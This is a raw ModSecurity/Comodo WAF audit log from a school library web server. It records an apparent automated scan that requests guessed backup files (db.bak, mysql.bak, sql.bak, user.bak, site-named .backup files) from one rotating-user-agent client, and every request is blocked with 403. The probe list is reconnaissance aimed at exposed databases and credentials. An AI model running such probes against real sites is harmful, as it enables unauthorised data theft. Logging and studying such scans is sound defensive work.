Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfc35d7b-Z-- --2392243b-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOE_QAAANA 103.236.140.4 59362 103.236.140.4 8181 --2392243b-B-- GET /dat.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166559750 --2392243b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2392243b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200892893 2088 (- - -) Stopwatch2: 1747683200892893 2088; combined=856, p1=435, p2=388, p3=0, p4=0, p5=33, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2392243b-Z-- --643cbd3c-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOFBQAAAMw 103.236.140.4 59882 103.236.140.4 8181 --643cbd3c-B-- GET /sql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:64.0.2) Gecko/20100101 Firefox/64.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155746331 --643cbd3c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --643cbd3c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200895535 1324 (- - -) Stopwatch2: 1747683200895535 1324; combined=529, p1=245, p2=265, p3=0, p4=0, p5=19, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --643cbd3c-Z-- --5b197d11-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9npgAAAE8 103.236.140.4 59444 103.236.140.4 8181 --5b197d11-B-- GET /user.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155746334 --5b197d11-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5b197d11-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200901561 1792 (- - -) Stopwatch2: 1747683200901561 1792; combined=661, p1=423, p2=220, p3=0, p4=0, p5=18, sr=184, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b197d11-Z-- --e080f13b-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonigAAAA8 103.236.140.4 58856 103.236.140.4 8181 --e080f13b-B-- GET /smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 91181268 --e080f13b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e080f13b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200902127 1728 (- - -) Stopwatch2: 1747683200902127 1728; combined=703, p1=368, p2=317, p3=0, p4=0, p5=18, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e080f13b-Z-- --87ee4915-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5_QAAAAIk 103.236.140.4 59877 103.236.140.4 8181 --87ee4915-B-- GET /tar.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 OPR/53.0.2907.68 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166526985 --87ee4915-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --87ee4915-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200905074 1562 (- - -) Stopwatch2: 1747683200905074 1562; combined=539, p1=264, p2=252, p3=0, p4=0, p5=23, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87ee4915-Z-- --4b6eab21-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOFIwAAAM0 103.236.140.4 59826 103.236.140.4 8181 --4b6eab21-B-- GET /old.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159108235 --4b6eab21-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4b6eab21-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200922451 1533 (- - -) Stopwatch2: 1747683200922451 1533; combined=575, p1=272, p2=279, p3=0, p4=0, p5=24, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b6eab21-Z-- --ea8a8e23-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9nqgAAAFU 103.236.140.4 59470 103.236.140.4 8181 --ea8a8e23-B-- GET /faisunzip.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.3.0) Gecko/20100101 Firefox/52.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162431006 --ea8a8e23-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ea8a8e23-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201298786 1874 (- - -) Stopwatch2: 1747683201298786 1874; combined=656, p1=336, p2=290, p3=0, p4=0, p5=29, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea8a8e23-Z-- --69f9d777-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFPgAAANE 103.236.140.4 59784 103.236.140.4 8181 --69f9d777-B-- GET /error_log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164415186 --69f9d777-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --69f9d777-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201306576 5900 (- - -) Stopwatch2: 1747683201306576 5900; combined=941, p1=422, p2=483, p3=0, p4=0, p5=35, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69f9d777-Z-- --c2f05327-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFQQAAANI 103.236.140.4 58982 103.236.140.4 8181 --c2f05327-B-- GET /website.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159261365 --c2f05327-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c2f05327-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201311243 1923 (- - -) Stopwatch2: 1747683201311243 1923; combined=706, p1=351, p2=329, p3=0, p4=0, p5=26, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2f05327-Z-- --d56ce571-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFRAAAANI 103.236.140.4 59168 103.236.140.4 8181 --d56ce571-B-- GET /joomla.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70844455 --d56ce571-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d56ce571-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201313278 2040 (- - -) Stopwatch2: 1747683201313278 2040; combined=782, p1=366, p2=388, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d56ce571-Z-- --1127ac4f-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9nswAAAEQ 103.236.140.4 59608 103.236.140.4 8181 --1127ac4f-B-- GET /smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0.1) Gecko/20100101 Firefox/59.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155779134 --1127ac4f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1127ac4f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201314715 2627 (- - -) Stopwatch2: 1747683201314715 2627; combined=833, p1=406, p2=393, p3=0, p4=0, p5=34, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1127ac4f-Z-- --4b5e9b0c-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9ntAAAAFg 103.236.140.4 59846 103.236.140.4 8181 --4b5e9b0c-B-- GET /sales.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165445647 --4b5e9b0c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4b5e9b0c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201315477 2072 (- - -) Stopwatch2: 1747683201315477 2072; combined=731, p1=370, p2=334, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b5e9b0c-Z-- --d7fe7620-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIonmwAAAAI 103.236.140.4 58914 103.236.140.4 8181 --d7fe7620-B-- GET /db.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 OPR/55.0.2994.47 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164888585 --d7fe7620-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d7fe7620-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201316457 2163 (- - -) Stopwatch2: 1747683201316457 2163; combined=834, p1=413, p2=383, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7fe7620-Z-- --b81c2869-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFTgAAAM0 103.236.140.4 58888 103.236.140.4 8181 --b81c2869-B-- GET /smkn22jakarta.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166625286 --b81c2869-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b81c2869-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201309842 11352 (- - -) Stopwatch2: 1747683201309842 11352; combined=967, p1=462, p2=471, p3=0, p4=0, p5=33, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b81c2869-Z-- --9e608b79-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9nvwAAAEQ 103.236.140.4 58946 103.236.140.4 8181 --9e608b79-B-- GET /mysql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 OPR/55.0.2994.61 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155287576 --9e608b79-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9e608b79-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201321060 2040 (- - -) Stopwatch2: 1747683201321060 2040; combined=777, p1=369, p2=380, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e608b79-Z-- --d0b73530-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_VgAAAI0 103.236.140.4 59620 103.236.140.4 8181 --d0b73530-B-- GET /smkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:56.0.2) Gecko/20100101 Firefox/56.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164724742 --d0b73530-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d0b73530-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201319808 7712 (- - -) Stopwatch2: 1747683201319808 7712; combined=861, p1=421, p2=406, p3=0, p4=0, p5=33, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
